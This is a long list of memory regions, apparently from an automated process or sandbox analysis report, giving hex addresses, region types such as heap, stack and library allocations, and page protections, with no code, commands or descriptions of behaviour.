page read and write
|
||
455E000
|
stack
|
page read and write
|
||
7660000
|
heap
|
page execute and read and write
|
||
8A87000
|
heap
|
page read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
82B0000
|
heap
|
page read and write
|
||
5F79000
|
trusted library allocation
|
page read and write
|
||
8F4E000
|
heap
|
page read and write
|
||
7D68000
|
heap
|
page read and write
|
||
7DA0000
|
trusted library allocation
|
page read and write
|
||
7620000
|
trusted library allocation
|
page read and write
|
||
6FCD000
|
stack
|
page read and write
|
||
3B5E000
|
stack
|
page read and write
|
||
7554000
|
heap
|
page read and write
|
||
7C50000
|
heap
|
page read and write
|
||
7B44000
|
heap
|
page read and write
|
||
4E30000
|
trusted library allocation
|
page read and write
|
||
7B4E000
|
stack
|
page read and write
|
||
513A000
|
trusted library allocation
|
page read and write
|
||
73CA6000
|
unkown
|
page readonly
|
||
946E000
|
stack
|
page read and write
|
||
33EF000
|
stack
|
page read and write
|
||
2ADA000
|
heap
|
page read and write
|
||
8A38000
|
heap
|
page read and write
|
||
123E000
|
heap
|
page read and write
|
||
9C90000
|
heap
|
page read and write
|
||
A55E000
|
heap
|
page read and write
|
||
927F000
|
stack
|
page read and write
|
||
309E000
|
stack
|
page read and write
|
||
8660000
|
trusted library allocation
|
page read and write
|
||
459E000
|
stack
|
page read and write
|
||
2AC0000
|
heap
|
page read and write
|
||
28BE000
|
stack
|
page read and write
|
||
306E000
|
stack
|
page read and write
|
||
32A8000
|
heap
|
page read and write
|
||
75ED000
|
trusted library allocation
|
page read and write
|
||
4947000
|
trusted library allocation
|
page execute and read and write
|
||
2ED7000
|
heap
|
page read and write
|
||
2D94000
|
trusted library allocation
|
page read and write
|
||
1256000
|
heap
|
page read and write
|
||
8730000
|
trusted library allocation
|
page read and write
|
||
6100000
|
trusted library allocation
|
page read and write
|
||
7D22000
|
trusted library allocation
|
page read and write
|
||
81A3000
|
heap
|
page read and write
|
||
F8B000
|
stack
|
page read and write
|
||
56A7000
|
trusted library allocation
|
page read and write
|
||
30E3000
|
heap
|
page read and write
|
||
4B8E000
|
stack
|
page read and write
|
||
3073000
|
heap
|
page read and write
|
||
4B3E000
|
stack
|
page read and write
|
||
48DE000
|
stack
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page execute and read and write
|
||
35F4000
|
trusted library allocation
|
page read and write
|
||
2FD0000
|
trusted library allocation
|
page read and write
|
||
818B000
|
heap
|
page read and write
|
||
31A0000
|
heap
|
page read and write
|
||
7542000
|
heap
|
page read and write
|
||
4FA0000
|
trusted library allocation
|
page read and write
|
||
5140000
|
trusted library allocation
|
page read and write
|
||
84A5000
|
heap
|
page read and write
|
||
4B90000
|
heap
|
page execute and read and write
|
||
27A0000
|
heap
|
page read and write
|
||
2E3D000
|
stack
|
page read and write
|
||
99B000
|
stack
|
page read and write
|
||
763E000
|
stack
|
page read and write
|
||
2F2E000
|
stack
|
page read and write
|
||
56A3000
|
trusted library allocation
|
page read and write
|
||
498E000
|
stack
|
page read and write
|
||
745A000
|
stack
|
page read and write
|
||
8CF000
|
stack
|
page read and write
|
||
8F8F000
|
heap
|
page read and write
|
||
8A28000
|
heap
|
page read and write
|
||
76F0000
|
trusted library allocation
|
page read and write
|
||
5E8000
|
heap
|
page read and write
|
||
82CC000
|
heap
|
page read and write
|
||
7D64000
|
heap
|
page read and write
|
||
3080000
|
heap
|
page read and write
|
||
433E000
|
stack
|
page read and write
|
||
4C0000
|
unkown
|
page readonly
|
||
35F0000
|
trusted library allocation
|
page read and write
|
||
7CEF000
|
stack
|
page read and write
|
||
72F5000
|
trusted library allocation
|
page read and write
|
||
2CFE000
|
stack
|
page read and write
|
||
8910000
|
heap
|
page read and write
|
||
4910000
|
trusted library allocation
|
page read and write
|
||
86EF000
|
stack
|
page read and write
|
||
8ABC000
|
heap
|
page read and write
|
||
684000
|
unkown
|
page execute and read and write
|
||
87B0000
|
trusted library allocation
|
page execute and read and write
|
||
762D000
|
stack
|
page read and write
|
||
834D000
|
stack
|
page read and write
|
||
50C7000
|
trusted library allocation
|
page read and write
|
||
E21000
|
heap
|
page read and write
|
||
3050000
|
heap
|
page read and write
|
||
70E0000
|
trusted library allocation
|
page read and write
|
||
6A00000
|
unclassified section
|
page read and write
|
||
32BD000
|
trusted library allocation
|
page execute and read and write
|
||
7430000
|
heap
|
page execute and read and write
|
||
8720000
|
trusted library allocation
|
page execute and read and write
|
||
46CE000
|
stack
|
page read and write
|
||
81CE000
|
heap
|
page read and write
|
||
2DF8000
|
heap
|
page read and write
|
||
3ADF000
|
stack
|
page read and write
|
||
14E0000
|
heap
|
page read and write
|
||
40CE000
|
stack
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
4924000
|
trusted library allocation
|
page read and write
|
||
56F5000
|
trusted library allocation
|
page read and write
|
||
432E000
|
stack
|
page read and write
|
||
4DC0000
|
heap
|
page readonly
|
||
3BEE000
|
stack
|
page read and write
|
||
7566000
|
heap
|
page read and write
|
||
750D000
|
stack
|
page read and write
|
||
CF0000
|
heap
|
page read and write
|
||
2ED8000
|
heap
|
page read and write
|
||
17CE000
|
stack
|
page read and write
|
||
4F84000
|
trusted library allocation
|
page read and write
|
||
3106000
|
heap
|
page read and write
|
||
3EAE000
|
stack
|
page read and write
|
||
83F0000
|
heap
|
page read and write
|
||
2B9E000
|
stack
|
page read and write
|
||
4DCE000
|
trusted library allocation
|
page read and write
|
||
8190000
|
trusted library allocation
|
page execute and read and write
|
||
76EE000
|
stack
|
page read and write
|
||
563A000
|
trusted library allocation
|
page read and write
|
||
72FF000
|
stack
|
page read and write
|
||
8240000
|
trusted library allocation
|
page read and write
|
||
4DB0000
|
trusted library allocation
|
page read and write
|
||
776E000
|
stack
|
page read and write
|
||
4750000
|
trusted library allocation
|
page read and write
|
||
7DEF000
|
heap
|
page read and write
|
||
2D20000
|
heap
|
page read and write
|
||
4D95000
|
trusted library allocation
|
page execute and read and write
|
||
5502000
|
trusted library allocation
|
page read and write
|
||
8163000
|
trusted library allocation
|
page read and write
|
||
796000
|
unkown
|
page execute and write copy
|
||
8940000
|
trusted library allocation
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
3127000
|
heap
|
page read and write
|
||
73FC000
|
heap
|
page read and write
|
||
4740000
|
trusted library allocation
|
page execute and read and write
|
||
84E0000
|
trusted library allocation
|
page read and write
|
||
865D000
|
trusted library allocation
|
page read and write
|
||
75C6000
|
heap
|
page read and write
|
||
68A000
|
stack
|
page read and write
|
||
881E000
|
stack
|
page read and write
|
||
75ED000
|
stack
|
page read and write
|
||
FF0D0000
|
trusted library allocation
|
page execute and read and write
|
||
41DE000
|
stack
|
page read and write
|
||
8379000
|
heap
|
page read and write
|
||
7AE0000
|
heap
|
page read and write
|
||
534D000
|
trusted library allocation
|
page read and write
|
||
82CB000
|
stack
|
page read and write
|
||
DDE000
|
heap
|
page read and write
|
||
4BDF000
|
trusted library allocation
|
page read and write
|
||
513E000
|
trusted library allocation
|
page read and write
|
||
2980000
|
direct allocation
|
page execute and read and write
|
||
484E000
|
stack
|
page read and write
|
||
886B000
|
heap
|
page read and write
|
||
47B1000
|
trusted library allocation
|
page read and write
|
||
5563000
|
trusted library allocation
|
page read and write
|
||
5143000
|
trusted library allocation
|
page read and write
|
||
4940000
|
trusted library allocation
|
page read and write
|
||
469D000
|
stack
|
page read and write
|
||
60F1000
|
trusted library allocation
|
page read and write
|
||
8830000
|
heap
|
page read and write
|
||
7BB0000
|
trusted library allocation
|
page read and write
|
||
D2C000
|
unkown
|
page execute and read and write
|
||
28E0000
|
trusted library allocation
|
page read and write
|
||
6D00000
|
heap
|
page read and write
|
||
2CB5000
|
heap
|
page read and write
|
||
7C0D000
|
stack
|
page read and write
|
||
470E000
|
stack
|
page read and write
|
||
7630000
|
trusted library allocation
|
page read and write
|
||
5573000
|
trusted library allocation
|
page read and write
|
||
8A62000
|
heap
|
page read and write
|
||
4F50000
|
trusted library allocation
|
page read and write
|
||
41CE000
|
stack
|
page read and write
|
||
5A6000
|
unkown
|
page execute and read and write
|
||
4F1C000
|
stack
|
page read and write
|
||
13DE000
|
heap
|
page read and write
|
||
2E70000
|
direct allocation
|
page execute and read and write
|
||
7D60000
|
heap
|
page read and write
|
||
4AB0000
|
trusted library allocation
|
page read and write
|
||
8380000
|
trusted library allocation
|
page read and write
|
||
E00000
|
heap
|
page read and write
|
||
8F60000
|
heap
|
page read and write
|
||
7AAC000
|
stack
|
page read and write
|
||
882A000
|
heap
|
page read and write
|
||
95C0000
|
trusted library allocation
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
81B2000
|
heap
|
page read and write
|
||
847E000
|
heap
|
page read and write
|
||
2FB4000
|
trusted library allocation
|
page read and write
|
||
42DF000
|
stack
|
page read and write
|
||
2E0E000
|
stack
|
page read and write
|
||
405F000
|
stack
|
page read and write
|
||
2B6F000
|
heap
|
page read and write
|
||
33AA000
|
heap
|
page read and write
|
||
4F30000
|
trusted library allocation
|
page read and write
|
||
2F8C000
|
stack
|
page read and write
|
||
2BA0000
|
unclassified section
|
page read and write
|
||
8170000
|
trusted library allocation
|
page read and write
|
||
35A000
|
unkown
|
page execute and read and write
|
||
4F5000
|
heap
|
page read and write
|
||
87DE000
|
stack
|
page read and write
|
||
92AE000
|
stack
|
page read and write
|
||
632000
|
unkown
|
page execute and read and write
|
||
589C000
|
trusted library allocation
|
page read and write
|
||
7439000
|
heap
|
page read and write
|
||
86AE000
|
stack
|
page read and write
|
||
2D40000
|
heap
|
page read and write
|
||
30D0000
|
heap
|
page read and write
|
||
3F1E000
|
stack
|
page read and write
|
||
6C69000
|
stack
|
page read and write
|
||
4E5C000
|
trusted library allocation
|
page read and write
|
||
1391000
|
heap
|
page read and write
|
||
7D6C000
|
heap
|
page read and write
|
||
6F8E000
|
stack
|
page read and write
|
||
30EA000
|
heap
|
page read and write
|
||
2FC3000
|
direct allocation
|
page execute and read and write
|
||
69FE000
|
stack
|
page read and write
|
||
7591000
|
heap
|
page read and write
|
||
730E000
|
stack
|
page read and write
|
||
4F67000
|
trusted library allocation
|
page execute and read and write
|
||
3BCE000
|
stack
|
page read and write
|
||
444E000
|
stack
|
page read and write
|
||
6178000
|
trusted library allocation
|
page read and write
|
||
4A8E000
|
stack
|
page read and write
|
||
4680000
|
trusted library allocation
|
page read and write
|
||
8710000
|
heap
|
page read and write
|
||
616A000
|
trusted library allocation
|
page read and write
|
||
3CCF000
|
stack
|
page read and write
|
||
4270000
|
heap
|
page execute and read and write
|
||
980000
|
heap
|
page read and write
|
||
8C9D000
|
stack
|
page read and write
|
||
76E0000
|
trusted library allocation
|
page read and write
|
||
7BEC000
|
stack
|
page read and write
|
||
73EE000
|
stack
|
page read and write
|
||
5817000
|
trusted library allocation
|
page read and write
|
||
E27000
|
heap
|
page read and write
|
||
561A000
|
trusted library allocation
|
page read and write
|
||
79C0000
|
heap
|
page execute and read and write
|
||
4C4F000
|
trusted library allocation
|
page read and write
|
||
58C0000
|
trusted library allocation
|
page read and write
|
||
7BA0000
|
trusted library allocation
|
page read and write
|
||
7845000
|
heap
|
page read and write
|
||
34DE000
|
stack
|
page read and write
|
||
2AB3000
|
direct allocation
|
page execute and read and write
|
||
7ED0000
|
trusted library allocation
|
page read and write
|
||
4EDE000
|
stack
|
page read and write
|
||
808E000
|
stack
|
page read and write
|
||
8793000
|
trusted library allocation
|
page read and write
|
||
FBB000
|
stack
|
page read and write
|
||
7DE0000
|
trusted library allocation
|
page read and write
|
||
3730000
|
trusted library allocation
|
page read and write
|
||
4E43000
|
trusted library allocation
|
page execute and read and write
|
||
32B3000
|
trusted library allocation
|
page execute and read and write
|
||
5A1E000
|
trusted library allocation
|
page read and write
|
||
8160000
|
trusted library allocation
|
page read and write
|
||
8496000
|
heap
|
page read and write
|
||
4C9000
|
unkown
|
page execute and read and write
|
||
467000
|
unkown
|
page execute and read and write
|
||
680D000
|
stack
|
page read and write
|
||
7C23000
|
trusted library allocation
|
page read and write
|
||
7C7D000
|
stack
|
page read and write
|
||
78C0000
|
heap
|
page read and write
|
||
3C9F000
|
stack
|
page read and write
|
||
4F50000
|
trusted library allocation
|
page read and write
|
||
81A7000
|
heap
|
page read and write
|
||
4D6D000
|
trusted library allocation
|
page execute and read and write
|
||
4D8A000
|
trusted library allocation
|
page execute and read and write
|
||
2A10000
|
heap
|
page read and write
|
||
36DE000
|
stack
|
page read and write
|
||
4C68000
|
trusted library allocation
|
page read and write
|
||
8C40000
|
trusted library allocation
|
page read and write
|
||
696E000
|
stack
|
page read and write
|
||
7BBF000
|
heap
|
page read and write
|
||
8820000
|
heap
|
page read and write
|
||
ECB000
|
stack
|
page read and write
|
||
2EF0000
|
heap
|
page read and write
|
||
5A1000
|
unkown
|
page execute and read and write
|
||
67EC000
|
stack
|
page read and write
|
||
4CCE000
|
stack
|
page read and write
|
||
74B0000
|
trusted library allocation
|
page read and write
|
||
165F000
|
stack
|
page read and write
|
||
8828000
|
heap
|
page read and write
|
||
4F0C000
|
stack
|
page read and write
|
||
2F90000
|
heap
|
page read and write
|
||
4B0E000
|
stack
|
page read and write
|
||
30C0000
|
heap
|
page read and write
|
||
752E000
|
stack
|
page read and write
|
||
830E000
|
stack
|
page read and write
|
||
83EC000
|
heap
|
page read and write
|
||
3720000
|
trusted library allocation
|
page read and write
|
||
6AD0000
|
heap
|
page read and write
|
||
7ECE000
|
stack
|
page read and write
|
||
741E000
|
stack
|
page read and write
|
||
72CC000
|
trusted library allocation
|
page read and write
|
||
768D000
|
stack
|
page read and write
|
||
7320000
|
trusted library allocation
|
page read and write
|
||
2B56000
|
heap
|
page read and write
|
||
2E90000
|
heap
|
page read and write
|
||
30B0000
|
heap
|
page read and write
|
||
4F40000
|
trusted library allocation
|
page read and write
|
||
6BEE000
|
stack
|
page read and write
|
||
49AE000
|
stack
|
page read and write
|
||
491E000
|
stack
|
page read and write
|
||
431E000
|
stack
|
page read and write
|
||
315E000
|
stack
|
page read and write
|
||
355000
|
unkown
|
page execute and read and write
|
||
5C2000
|
unkown
|
page execute and read and write
|
||
720A000
|
stack
|
page read and write
|
||
32D0000
|
trusted library allocation
|
page read and write
|
||
434E000
|
stack
|
page read and write
|
||
3220000
|
trusted library allocation
|
page read and write
|
||
D5E000
|
stack
|
page read and write
|
||
511D000
|
trusted library allocation
|
page read and write
|
||
7A8E000
|
stack
|
page read and write
|
||
89BE000
|
stack
|
page read and write
|
||
73CAD000
|
unkown
|
page read and write
|
||
48E0000
|
trusted library allocation
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
7CC0000
|
trusted library allocation
|
page read and write
|
||
492D000
|
trusted library allocation
|
page read and write
|
||
3460000
|
heap
|
page read and write
|
||
5D29000
|
trusted library allocation
|
page read and write
|
||
5EAE000
|
trusted library allocation
|
page read and write
|
||
5EF000
|
unkown
|
page execute and read and write
|
||
531000
|
unkown
|
page execute and read and write
|
||
8FEE000
|
heap
|
page read and write
|
||
1485000
|
heap
|
page read and write
|
||
5230000
|
trusted library allocation
|
page read and write
|
||
4913000
|
trusted library allocation
|
page execute and read and write
|
||
7520000
|
heap
|
page execute and read and write
|
||
67B000
|
unkown
|
page execute and read and write
|
||
8010000
|
trusted library allocation
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
2F3D000
|
stack
|
page read and write
|
||
73FD000
|
stack
|
page read and write
|
||
82C0000
|
heap
|
page read and write
|
||
54B5000
|
trusted library allocation
|
page read and write
|
||
76AE000
|
stack
|
page read and write
|
||
73CAF000
|
unkown
|
page readonly
|
||
549000
|
unkown
|
page execute and read and write
|
||
4E59000
|
stack
|
page read and write
|
||
45B7000
|
trusted library allocation
|
page execute and read and write
|
||
75E000
|
stack
|
page read and write
|
||
73CAD000
|
unkown
|
page read and write
|
||
41EC000
|
stack
|
page read and write
|
||
57B1000
|
trusted library allocation
|
page read and write
|
||
848A000
|
heap
|
page read and write
|
||
7F790000
|
trusted library allocation
|
page execute and read and write
|
||
6D81000
|
heap
|
page read and write
|
||
7770000
|
trusted library allocation
|
page execute and read and write
|
||
3B8E000
|
stack
|
page read and write
|
||
3400000
|
heap
|
page read and write
|
||
AA2000
|
unkown
|
page execute and write copy
|
||
6FA0000
|
heap
|
page execute and read and write
|
||
40F0000
|
direct allocation
|
page read and write
|
||
2FBE000
|
stack
|
page read and write
|
||
74F0000
|
trusted library allocation
|
page read and write
|
||
4240000
|
trusted library allocation
|
page execute and read and write
|
||
33D0000
|
heap
|
page read and write
|
||
2AE0000
|
heap
|
page read and write
|
||
7640000
|
trusted library allocation
|
page read and write
|
||
13A0000
|
heap
|
page read and write
|
||
819D000
|
stack
|
page read and write
|
||
2AD4000
|
heap
|
page read and write
|
||
2C40000
|
heap
|
page read and write
|
||
35AF000
|
stack
|
page read and write
|
||
4BFC000
|
stack
|
page read and write
|
||
3FEE000
|
stack
|
page read and write
|
||
73C91000
|
unkown
|
page execute read
|
||
4D0E000
|
stack
|
page read and write
|
||
3010000
|
heap
|
page read and write
|
||
6DC9000
|
heap
|
page read and write
|
||
3724000
|
trusted library allocation
|
page read and write
|
||
35E0000
|
trusted library allocation
|
page read and write
|
||
3CDE000
|
stack
|
page read and write
|
||
7F0E8000
|
trusted library allocation
|
page execute and read and write
|
||
E32000
|
heap
|
page read and write
|
||
9CAE000
|
stack
|
page read and write
|
||
834E000
|
stack
|
page read and write
|
||
6C0E000
|
stack
|
page read and write
|
||
4AC5000
|
trusted library allocation
|
page read and write
|
||
1430000
|
heap
|
page read and write
|
||
523E000
|
trusted library allocation
|
page read and write
|
||
835C000
|
heap
|
page read and write
|
||
4DE0000
|
heap
|
page read and write
|
||
70D000
|
unkown
|
page execute and read and write
|
||
77EE000
|
stack
|
page read and write
|
||
2DA9000
|
trusted library allocation
|
page read and write
|
||
78B5000
|
heap
|
page read and write
|
||
8D8B000
|
stack
|
page read and write
|
||
8990000
|
trusted library allocation
|
page read and write
|
||
1E8000
|
unkown
|
page execute and write copy
|
||
8220000
|
heap
|
page read and write
|
||
5146000
|
trusted library allocation
|
page read and write
|
||
5566000
|
trusted library allocation
|
page read and write
|
||
4198000
|
trusted library allocation
|
page read and write
|
||
6AD000
|
stack
|
page read and write
|
||
506E000
|
stack
|
page read and write
|
||
5A9000
|
unkown
|
page execute and read and write
|
||
36CE000
|
stack
|
page read and write
|
||
8260000
|
trusted library allocation
|
page read and write
|
||
747E000
|
stack
|
page read and write
|
||
4D00000
|
trusted library allocation
|
page read and write
|
||
1311000
|
heap
|
page read and write
|
||
7DCB000
|
heap
|
page read and write
|
||
57D9000
|
trusted library allocation
|
page read and write
|
||
594A000
|
trusted library allocation
|
page read and write
|
||
4F6B000
|
trusted library allocation
|
page execute and read and write
|
||
2B56000
|
heap
|
page read and write
|
||
73C9000
|
heap
|
page read and write
|
||
9036000
|
heap
|
page read and write
|
||
78F000
|
stack
|
page read and write
|
||
4E4E000
|
stack
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
4AC0000
|
trusted library allocation
|
page read and write
|
||
302E000
|
stack
|
page read and write
|
||
7290000
|
trusted library allocation
|
page read and write
|
||
15BE000
|
stack
|
page read and write
|
||
AA8000
|
unkown
|
page execute and read and write
|
||
8FA9000
|
heap
|
page read and write
|
||
873A000
|
trusted library allocation
|
page read and write
|
||
4D3000
|
heap
|
page read and write
|
||
2A10000
|
remote allocation
|
page read and write
|
||
4930000
|
trusted library allocation
|
page read and write
|
||
4D90000
|
trusted library allocation
|
page read and write
|
||
6CCE000
|
stack
|
page read and write
|
||
4A60000
|
direct allocation
|
page read and write
|
||
8E8D000
|
stack
|
page read and write
|
||
7551000
|
heap
|
page read and write
|
||
73CAD000
|
unkown
|
page read and write
|
||
8630000
|
trusted library allocation
|
page read and write
|
||
88FE000
|
stack
|
page read and write
|
||
2AF6000
|
heap
|
page read and write
|
||
6D79000
|
heap
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
2B50000
|
heap
|
page read and write
|
||
900D000
|
heap
|
page read and write
|
||
78AD000
|
heap
|
page read and write
|
||
A05E000
|
stack
|
page read and write
|
||
42FE000
|
stack
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
5687000
|
trusted library allocation
|
page read and write
|
||
2FF9000
|
heap
|
page read and write
|
||
7840000
|
trusted library allocation
|
page read and write
|
||
8838000
|
heap
|
page read and write
|
||
7CB0000
|
trusted library allocation
|
page read and write
|
||
43C1000
|
trusted library allocation
|
page read and write
|
||
FC8000
|
stack
|
page read and write
|
||
7690000
|
trusted library allocation
|
page read and write
|
||
8780000
|
trusted library allocation
|
page read and write
|
||
409E000
|
stack
|
page read and write
|
||
3310000
|
heap
|
page readonly
|
||
514B000
|
trusted library allocation
|
page read and write
|
||
4E70000
|
trusted library allocation
|
page read and write
|
||
1575000
|
heap
|
page read and write
|
||
3070000
|
heap
|
page read and write
|
||
D40000
|
unkown
|
page execute and read and write
|
||
6D70000
|
heap
|
page read and write
|
||
772E000
|
stack
|
page read and write
|
||
4F60000
|
heap
|
page execute and read and write
|
||
45BB000
|
trusted library allocation
|
page execute and read and write
|
||
45CE000
|
stack
|
page read and write
|
||
9007000
|
heap
|
page read and write
|
||
5659000
|
trusted library allocation
|
page read and write
|
||
4FAA000
|
heap
|
page read and write
|
||
8650000
|
trusted library allocation
|
page read and write
|
||
55DB000
|
trusted library allocation
|
page read and write
|
||
3A4E000
|
stack
|
page read and write
|
||
980E000
|
stack
|
page read and write
|
||
2DB0000
|
heap
|
page read and write
|
||
83F4000
|
heap
|
page read and write
|
||
760D000
|
stack
|
page read and write
|
||
32EE000
|
stack
|
page read and write
|
||
81DE000
|
stack
|
page read and write
|
||
44AE000
|
stack
|
page read and write
|
||
4D80000
|
trusted library allocation
|
page read and write
|
||
779E000
|
stack
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page read and write
|
||
7F5D8000
|
trusted library allocation
|
page execute and read and write
|
||
30E3000
|
heap
|
page read and write
|
||
3120000
|
direct allocation
|
page execute and read and write
|
||
4CEE000
|
stack
|
page read and write
|
||
55FB000
|
trusted library allocation
|
page read and write
|
||
476000
|
unkown
|
page execute and write copy
|
||
726000
|
unkown
|
page execute and write copy
|
||
7ACE000
|
stack
|
page read and write
|
||
12E0000
|
heap
|
page read and write
|
||
7FCE000
|
stack
|
page read and write
|
||
5667000
|
trusted library allocation
|
page read and write
|
||
7F80000
|
trusted library allocation
|
page read and write
|
||
56D000
|
stack
|
page read and write
|
||
450000
|
unkown
|
page readonly
|
||
2FE5000
|
trusted library allocation
|
page execute and read and write
|
||
5427000
|
trusted library allocation
|
page read and write
|
||
3190000
|
heap
|
page read and write
|
||
78C2000
|
heap
|
page read and write
|
||
893E000
|
stack
|
page read and write
|
||
A7A0000
|
trusted library allocation
|
page execute and read and write
|
||
4D90000
|
heap
|
page read and write
|
||
8C10000
|
trusted library allocation
|
page read and write
|
||
2DBF000
|
stack
|
page read and write
|
||
336E000
|
stack
|
page read and write
|
||
D00000
|
heap
|
page read and write
|
||
37DF000
|
stack
|
page read and write
|
||
3105000
|
heap
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
4E77000
|
trusted library allocation
|
page execute and read and write
|
||
155E000
|
heap
|
page read and write
|
||
76CB000
|
stack
|
page read and write
|
||
405E000
|
stack
|
page read and write
|
||
2D93000
|
trusted library allocation
|
page execute and read and write
|
||
2B56000
|
heap
|
page read and write
|
||
3260000
|
heap
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page read and write
|
||
595A000
|
trusted library allocation
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
4C60000
|
trusted library allocation
|
page read and write
|
||
4E44000
|
trusted library allocation
|
page read and write
|
||
47DF000
|
trusted library allocation
|
page read and write
|
||
45D0000
|
trusted library allocation
|
page read and write
|
||
31A5000
|
heap
|
page read and write
|
||
73EE000
|
stack
|
page read and write
|
||
3110000
|
direct allocation
|
page execute and read and write
|
||
7BEE000
|
trusted library allocation
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
157E000
|
stack
|
page read and write
|
||
441F000
|
stack
|
page read and write
|
||
6ECD000
|
stack
|
page read and write
|
||
2AF0000
|
heap
|
page read and write
|
||
8C30000
|
trusted library allocation
|
page read and write
|
||
7BAD000
|
stack
|
page read and write
|
||
30C0000
|
heap
|
page read and write
|
||
2B5E000
|
stack
|
page read and write
|
||
45B0000
|
trusted library allocation
|
page read and write
|
||
2B15000
|
heap
|
page read and write
|
||
6DF8000
|
heap
|
page read and write
|
||
2B6F000
|
heap
|
page read and write
|
||
5418000
|
trusted library allocation
|
page read and write
|
||
30EA000
|
heap
|
page read and write
|
||
7AD000
|
stack
|
page read and write
|
||
88A4000
|
heap
|
page read and write
|
||
8AB000
|
stack
|
page read and write
|
||
7B80000
|
trusted library allocation
|
page execute and read and write
|
||
8663000
|
trusted library allocation
|
page read and write
|
||
A2DE000
|
stack
|
page read and write
|
||
32AF000
|
stack
|
page read and write
|
||
431E000
|
stack
|
page read and write
|
||
2F80000
|
trusted library section
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
73CA6000
|
unkown
|
page readonly
|
||
8388000
|
heap
|
page read and write
|
||
8F73000
|
heap
|
page read and write
|
||
8800000
|
trusted library allocation
|
page execute and read and write
|
||
50EE000
|
stack
|
page read and write
|
||
6F0B000
|
stack
|
page read and write
|
||
72F7000
|
trusted library allocation
|
page read and write
|
||
6170000
|
trusted library allocation
|
page read and write
|
||
E9A000
|
heap
|
page read and write
|
||
83CE000
|
stack
|
page read and write
|
||
2D90000
|
trusted library allocation
|
page read and write
|
||
2B50000
|
heap
|
page read and write
|
||
408E000
|
stack
|
page read and write
|
||
885B000
|
trusted library allocation
|
page read and write
|
||
8322000
|
heap
|
page read and write
|
||
72DE000
|
stack
|
page read and write
|
||
63F000
|
unkown
|
page execute and read and write
|
||
49B1000
|
trusted library allocation
|
page read and write
|
||
479E000
|
stack
|
page read and write
|
||
8930000
|
trusted library allocation
|
page read and write
|
||
3140000
|
heap
|
page read and write
|
||
30EC000
|
heap
|
page read and write
|
||
2AD0000
|
direct allocation
|
page execute and read and write
|
||
E97000
|
heap
|
page read and write
|
||
3200000
|
trusted library section
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
7ADD000
|
stack
|
page read and write
|
||
84F0000
|
trusted library allocation
|
page read and write
|
||
E1A000
|
heap
|
page read and write
|
||
2DFA000
|
heap
|
page read and write
|
||
30A0000
|
heap
|
page read and write
|
||
4FE2000
|
trusted library allocation
|
page read and write
|
||
4662000
|
trusted library allocation
|
page read and write
|
||
2AD9000
|
heap
|
page read and write
|
||
2940000
|
heap
|
page read and write
|
||
9C6E000
|
stack
|
page read and write
|
||
420E000
|
stack
|
page read and write
|
||
7851000
|
heap
|
page read and write
|
||
50EE000
|
stack
|
page read and write
|
||
4DA000
|
heap
|
page read and write
|
||
4C49000
|
trusted library allocation
|
page read and write
|
||
746E000
|
stack
|
page read and write
|
||
702E000
|
stack
|
page read and write
|
||
4FA0000
|
heap
|
page read and write
|
||
3F5E000
|
stack
|
page read and write
|
||
5A20000
|
trusted library allocation
|
page read and write
|
||
4F40000
|
heap
|
page read and write
|
||
7EC5000
|
trusted library allocation
|
page read and write
|
||
75B0000
|
heap
|
page read and write
|
||
7CE000
|
stack
|
page read and write
|
||
4C9E000
|
stack
|
page read and write
|
||
4E75000
|
trusted library allocation
|
page execute and read and write
|
||
7830000
|
heap
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
1C2000
|
unkown
|
page execute and write copy
|
||
2FDE000
|
unkown
|
page read and write
|
||
2FC0000
|
trusted library allocation
|
page read and write
|
||
436E000
|
stack
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
349000
|
unkown
|
page execute and read and write
|
||
73CAD000
|
unkown
|
page read and write
|
||
7E0D000
|
heap
|
page read and write
|
||
70A000
|
unkown
|
page execute and read and write
|
||
776D000
|
stack
|
page read and write
|
||
334D000
|
stack
|
page read and write
|
||
498000
|
stack
|
page read and write
|
||
4D70000
|
trusted library allocation
|
page read and write
|
||
423C000
|
stack
|
page read and write
|
||
358E000
|
stack
|
page read and write
|
||
725F000
|
stack
|
page read and write
|
||
2E6E000
|
heap
|
page read and write
|
||
2F3E000
|
stack
|
page read and write
|
||
9020000
|
heap
|
page read and write
|
||
2D60000
|
trusted library section
|
page read and write
|
||
4E50000
|
trusted library allocation
|
page read and write
|
||
86CE000
|
stack
|
page read and write
|
||
7CEE000
|
stack
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
1320000
|
heap
|
page read and write
|
||
A551000
|
heap
|
page read and write
|
||
4F5A000
|
trusted library allocation
|
page execute and read and write
|
||
31E0000
|
heap
|
page read and write
|
||
81BE000
|
heap
|
page read and write
|
||
2FE2000
|
trusted library allocation
|
page read and write
|
||
341E000
|
stack
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
6D35000
|
heap
|
page execute and read and write
|
||
903E000
|
stack
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
7190000
|
trusted library allocation
|
page read and write
|
||
819E000
|
heap
|
page read and write
|
||
73F6000
|
heap
|
page read and write
|
||
2925000
|
trusted library allocation
|
page execute and read and write
|
||
5665000
|
trusted library allocation
|
page read and write
|
||
4CF0000
|
heap
|
page read and write
|
||
28F3000
|
trusted library allocation
|
page execute and read and write
|
||
4FEE000
|
stack
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
7647000
|
